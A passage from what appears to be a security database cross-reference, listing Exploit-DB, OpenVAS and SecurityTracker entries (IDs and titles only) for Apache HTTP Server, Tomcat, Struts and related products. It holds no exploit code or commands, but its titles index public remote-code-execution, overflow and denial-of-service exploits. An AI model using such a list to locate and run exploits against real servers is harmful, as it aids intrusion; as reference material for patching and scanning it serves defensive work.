16076| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
16077| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
16078| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
16079| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
16080| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
16081| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
16082| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
16083| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
16084| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
16085| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
16086| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
16087| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
16088| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
16089| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
16090| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
16091| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
16092| [20558] Apache 1.2 Web Server DoS Vulnerability
16093| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
16094| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
16095| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
16096| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
16097| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
16098| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
16099| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
16100| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
16101| [19231] PHP apache_request_headers Function Buffer Overflow
16102| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
16103| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
16104| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
16105| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
16106| [18442] Apache httpOnly Cookie Disclosure
16107| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
16108| [18221] Apache HTTP Server Denial of Service
16109| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
16110| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
16111| [17691] Apache Struts < 2.2.0 - Remote Command Execution
16112| [16798] Apache mod_jk 1.2.20 Buffer Overflow
16113| [16782] Apache Win32 Chunked Encoding
16114| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
16115| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
16116| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
16117| [15319] Apache 2.2 (Windows) Local Denial of Service
16118| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
16119| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
16120| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
16121| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
16122| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
16123| [12330] Apache OFBiz - Multiple XSS
16124| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
16125| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
16126| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
16127| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
16128| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
16129| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
16130| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
16131| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
16132| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
16133| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
16134| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
16135| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
16136| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
16137| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
16138| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
16139| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
16140| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
16141| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
16142| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
16143| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
16144| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
16145| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
16146| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
16147| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
16148| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
16149| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
16150| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
16151| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
16152| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
16153| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
16154| [466] htpasswd Apache 1.3.31 - Local Exploit
16155| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
16156| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
16157| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
16158| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
16159| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
16160| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
16161| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
16162| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
16163| [9] Apache HTTP Server 2.x Memory Leak Exploit
16164|
16165| OpenVAS (Nessus) - http://www.openvas.org:
16166| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
16167| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
16168| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
16169| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
16170| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
16171| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
16172| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
16173| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
16174| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
16175| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
16176| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
16177| [900571] Apache APR-Utils Version Detection
16178| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
16179| [900496] Apache Tiles Multiple XSS Vulnerability
16180| [900493] Apache Tiles Version Detection
16181| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
16182| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
16183| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
16184| [870175] RedHat Update for apache RHSA-2008:0004-01
16185| [864591] Fedora Update for apache-poi FEDORA-2012-10835
16186| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
16187| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
16188| [864250] Fedora Update for apache-poi FEDORA-2012-7683
16189| [864249] Fedora Update for apache-poi FEDORA-2012-7686
16190| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
16191| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
16192| [855821] Solaris Update for Apache 1.3 122912-19
16193| [855812] Solaris Update for Apache 1.3 122911-19
16194| [855737] Solaris Update for Apache 1.3 122911-17
16195| [855731] Solaris Update for Apache 1.3 122912-17
16196| [855695] Solaris Update for Apache 1.3 122911-16
16197| [855645] Solaris Update for Apache 1.3 122912-16
16198| [855587] Solaris Update for kernel update and Apache 108529-29
16199| [855566] Solaris Update for Apache 116973-07
16200| [855531] Solaris Update for Apache 116974-07
16201| [855524] Solaris Update for Apache 2 120544-14
16202| [855494] Solaris Update for Apache 1.3 122911-15
16203| [855478] Solaris Update for Apache Security 114145-11
16204| [855472] Solaris Update for Apache Security 113146-12
16205| [855179] Solaris Update for Apache 1.3 122912-15
16206| [855147] Solaris Update for kernel update and Apache 108528-29
16207| [855077] Solaris Update for Apache 2 120543-14
16208| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
16209| [850088] SuSE Update for apache2 SUSE-SA:2007:061
16210| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
16211| [841209] Ubuntu Update for apache2 USN-1627-1
16212| [840900] Ubuntu Update for apache2 USN-1368-1
16213| [840798] Ubuntu Update for apache2 USN-1259-1
16214| [840734] Ubuntu Update for apache2 USN-1199-1
16215| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
16216| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
16217| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
16218| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
16219| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
16220| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
16221| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
16222| [835253] HP-UX Update for Apache Web Server HPSBUX02645
16223| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
16224| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
16225| [835236] HP-UX Update for Apache with PHP HPSBUX02543
16226| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
16227| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
16228| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
16229| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
16230| [835188] HP-UX Update for Apache HPSBUX02308
16231| [835181] HP-UX Update for Apache With PHP HPSBUX02332
16232| [835180] HP-UX Update for Apache with PHP HPSBUX02342
16233| [835172] HP-UX Update for Apache HPSBUX02365
16234| [835168] HP-UX Update for Apache HPSBUX02313
16235| [835148] HP-UX Update for Apache HPSBUX01064
16236| [835139] HP-UX Update for Apache with PHP HPSBUX01090
16237| [835131] HP-UX Update for Apache HPSBUX00256
16238| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
16239| [835104] HP-UX Update for Apache HPSBUX00224
16240| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
16241| [835101] HP-UX Update for Apache HPSBUX01232
16242| [835080] HP-UX Update for Apache HPSBUX02273
16243| [835078] HP-UX Update for ApacheStrong HPSBUX00255
16244| [835044] HP-UX Update for Apache HPSBUX01019
16245| [835040] HP-UX Update for Apache PHP HPSBUX00207
16246| [835025] HP-UX Update for Apache HPSBUX00197
16247| [835023] HP-UX Update for Apache HPSBUX01022
16248| [835022] HP-UX Update for Apache HPSBUX02292
16249| [835005] HP-UX Update for Apache HPSBUX02262
16250| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
16251| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
16252| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
16253| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
16254| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
16255| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
16256| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
16257| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
16258| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
16259| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
16260| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
16261| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
16262| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
16263| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
16264| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
16265| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
16266| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
16267| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
16268| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
16269| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
16270| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
16271| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
16272| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
16273| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
16274| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
16275| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
16276| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
16277| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
16278| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
16279| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
16280| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
16281| [801942] Apache Archiva Multiple Vulnerabilities
16282| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
16283| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
16284| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
16285| [801284] Apache Derby Information Disclosure Vulnerability
16286| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
16287| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
16288| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
16289| [800680] Apache APR Version Detection
16290| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
16291| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
16292| [800677] Apache Roller Version Detection
16293| [800279] Apache mod_jk Module Version Detection
16294| [800278] Apache Struts Cross Site Scripting Vulnerability
16295| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
16296| [800276] Apache Struts Version Detection
16297| [800271] Apache Struts Directory Traversal Vulnerability
16298| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
16299| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
16300| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
16301| [103122] Apache Web Server ETag Header Information Disclosure Weakness
16302| [103074] Apache Continuum Cross Site Scripting Vulnerability
16303| [103073] Apache Continuum Detection
16304| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
16305| [101023] Apache Open For Business Weak Password security check
16306| [101020] Apache Open For Business HTML injection vulnerability
16307| [101019] Apache Open For Business service detection
16308| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
16309| [100923] Apache Archiva Detection
16310| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
16311| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
16312| [100813] Apache Axis2 Detection
16313| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
16314| [100795] Apache Derby Detection
16315| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
16316| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
16317| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
16318| [100514] Apache Multiple Security Vulnerabilities
16319| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
16320| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
16321| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
16322| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
16323| [72626] Debian Security Advisory DSA 2579-1 (apache2)
16324| [72612] FreeBSD Ports: apache22
16325| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
16326| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
16327| [71512] FreeBSD Ports: apache
16328| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
16329| [71256] Debian Security Advisory DSA 2452-1 (apache2)
16330| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
16331| [70737] FreeBSD Ports: apache
16332| [70724] Debian Security Advisory DSA 2405-1 (apache2)
16333| [70600] FreeBSD Ports: apache
16334| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
16335| [70235] Debian Security Advisory DSA 2298-2 (apache2)
16336| [70233] Debian Security Advisory DSA 2298-1 (apache2)
16337| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
16338| [69338] Debian Security Advisory DSA 2202-1 (apache2)
16339| [67868] FreeBSD Ports: apache
16340| [66816] FreeBSD Ports: apache
16341| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
16342| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
16343| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
16344| [66081] SLES11: Security update for Apache 2
16345| [66074] SLES10: Security update for Apache 2
16346| [66070] SLES9: Security update for Apache 2
16347| [65998] SLES10: Security update for apache2-mod_python
16348| [65893] SLES10: Security update for Apache 2
16349| [65888] SLES10: Security update for Apache 2
16350| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
16351| [65510] SLES9: Security update for Apache 2
16352| [65472] SLES9: Security update for Apache
16353| [65467] SLES9: Security update for Apache
16354| [65450] SLES9: Security update for apache2
16355| [65390] SLES9: Security update for Apache2
16356| [65363] SLES9: Security update for Apache2
16357| [65309] SLES9: Security update for Apache and mod_ssl
16358| [65296] SLES9: Security update for webdav apache module
16359| [65283] SLES9: Security update for Apache2
16360| [65249] SLES9: Security update for Apache 2
16361| [65230] SLES9: Security update for Apache 2
16362| [65228] SLES9: Security update for Apache 2
16363| [65212] SLES9: Security update for apache2-mod_python
16364| [65209] SLES9: Security update for apache2-worker
16365| [65207] SLES9: Security update for Apache 2
16366| [65168] SLES9: Security update for apache2-mod_python
16367| [65142] SLES9: Security update for Apache2
16368| [65136] SLES9: Security update for Apache 2
16369| [65132] SLES9: Security update for apache
16370| [65131] SLES9: Security update for Apache 2 oes/CORE
16371| [65113] SLES9: Security update for apache2
16372| [65072] SLES9: Security update for apache and mod_ssl
16373| [65017] SLES9: Security update for Apache 2
16374| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
16375| [64783] FreeBSD Ports: apache
16376| [64774] Ubuntu USN-802-2 (apache2)
16377| [64653] Ubuntu USN-813-2 (apache2)
16378| [64559] Debian Security Advisory DSA 1834-2 (apache2)
16379| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
16380| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
16381| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
16382| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
16383| [64443] Ubuntu USN-802-1 (apache2)
16384| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
16385| [64423] Debian Security Advisory DSA 1834-1 (apache2)
16386| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
16387| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
16388| [64251] Debian Security Advisory DSA 1816-1 (apache2)
16389| [64201] Ubuntu USN-787-1 (apache2)
16390| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
16391| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
16392| [63565] FreeBSD Ports: apache
16393| [63562] Ubuntu USN-731-1 (apache2)
16394| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
16395| [61185] FreeBSD Ports: apache
16396| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
16397| [60387] Slackware Advisory SSA:2008-045-02 apache
16398| [58826] FreeBSD Ports: apache-tomcat
16399| [58825] FreeBSD Ports: apache-tomcat
16400| [58804] FreeBSD Ports: apache
16401| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
16402| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
16403| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
16404| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
16405| [57335] Debian Security Advisory DSA 1167-1 (apache)
16406| [57201] Debian Security Advisory DSA 1131-1 (apache)
16407| [57200] Debian Security Advisory DSA 1132-1 (apache2)
16408| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
16409| [57145] FreeBSD Ports: apache
16410| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
16411| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
16412| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
16413| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
16414| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
16415| [56067] FreeBSD Ports: apache
16416| [55803] Slackware Advisory SSA:2005-310-04 apache
16417| [55519] Debian Security Advisory DSA 839-1 (apachetop)
16418| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
16419| [55355] FreeBSD Ports: apache
16420| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
16421| [55261] Debian Security Advisory DSA 805-1 (apache2)
16422| [55259] Debian Security Advisory DSA 803-1 (apache)
16423| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
16424| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
16425| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
16426| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
16427| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
16428| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
16429| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
16430| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
16431| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
16432| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
16433| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
16434| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
16435| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
16436| [54439] FreeBSD Ports: apache
16437| [53931] Slackware Advisory SSA:2004-133-01 apache
16438| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
16439| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
16440| [53878] Slackware Advisory SSA:2003-308-01 apache security update
16441| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
16442| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
16443| [53848] Debian Security Advisory DSA 131-1 (apache)
16444| [53784] Debian Security Advisory DSA 021-1 (apache)
16445| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
16446| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
16447| [53735] Debian Security Advisory DSA 187-1 (apache)
16448| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
16449| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
16450| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
16451| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
16452| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
16453| [53282] Debian Security Advisory DSA 594-1 (apache)
16454| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
16455| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
16456| [53215] Debian Security Advisory DSA 525-1 (apache)
16457| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
16458| [52529] FreeBSD Ports: apache+ssl
16459| [52501] FreeBSD Ports: apache
16460| [52461] FreeBSD Ports: apache
16461| [52390] FreeBSD Ports: apache
16462| [52389] FreeBSD Ports: apache
16463| [52388] FreeBSD Ports: apache
16464| [52383] FreeBSD Ports: apache
16465| [52339] FreeBSD Ports: apache+mod_ssl
16466| [52331] FreeBSD Ports: apache
16467| [52329] FreeBSD Ports: ru-apache+mod_ssl
16468| [52314] FreeBSD Ports: apache
16469| [52310] FreeBSD Ports: apache
16470| [15588] Detect Apache HTTPS
16471| [15555] Apache mod_proxy content-length buffer overflow
16472| [15554] Apache mod_include priviledge escalation
16473| [14771] Apache <= 1.3.33 htpasswd local overflow
16474| [14177] Apache mod_access rule bypass
16475| [13644] Apache mod_rootme Backdoor
16476| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
16477| [12280] Apache Connection Blocking Denial of Service
16478| [12239] Apache Error Log Escape Sequence Injection
16479| [12123] Apache Tomcat source.jsp malformed request information disclosure
16480| [12085] Apache Tomcat servlet/JSP container default files
16481| [11438] Apache Tomcat Directory Listing and File disclosure
16482| [11204] Apache Tomcat Default Accounts
16483| [11092] Apache 2.0.39 Win32 directory traversal
16484| [11046] Apache Tomcat TroubleShooter Servlet Installed
16485| [11042] Apache Tomcat DOS Device Name XSS
16486| [11041] Apache Tomcat /servlet Cross Site Scripting
16487| [10938] Apache Remote Command Execution via .bat files
16488| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
16489| [10773] MacOS X Finder reveals contents of Apache Web files
16490| [10766] Apache UserDir Sensitive Information Disclosure
16491| [10756] MacOS X Finder reveals contents of Apache Web directories
16492| [10752] Apache Auth Module SQL Insertion Attack
16493| [10704] Apache Directory Listing
16494| [10678] Apache /server-info accessible
16495| [10677] Apache /server-status accessible
16496| [10440] Check for Apache Multiple / vulnerability
16497|
16498| SecurityTracker - https://www.securitytracker.com:
16499| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
16500| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
16501| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
16502| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
16503| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
16504| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
16505| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
16506| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
16507| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
16508| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
16509| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
16510| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
16511| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
16512| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
16513| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
16514| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
16515| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
16516| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
16517| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
16518| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
16519| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
16520| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
16521| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
16522| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
16523| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
16524| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
16525| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
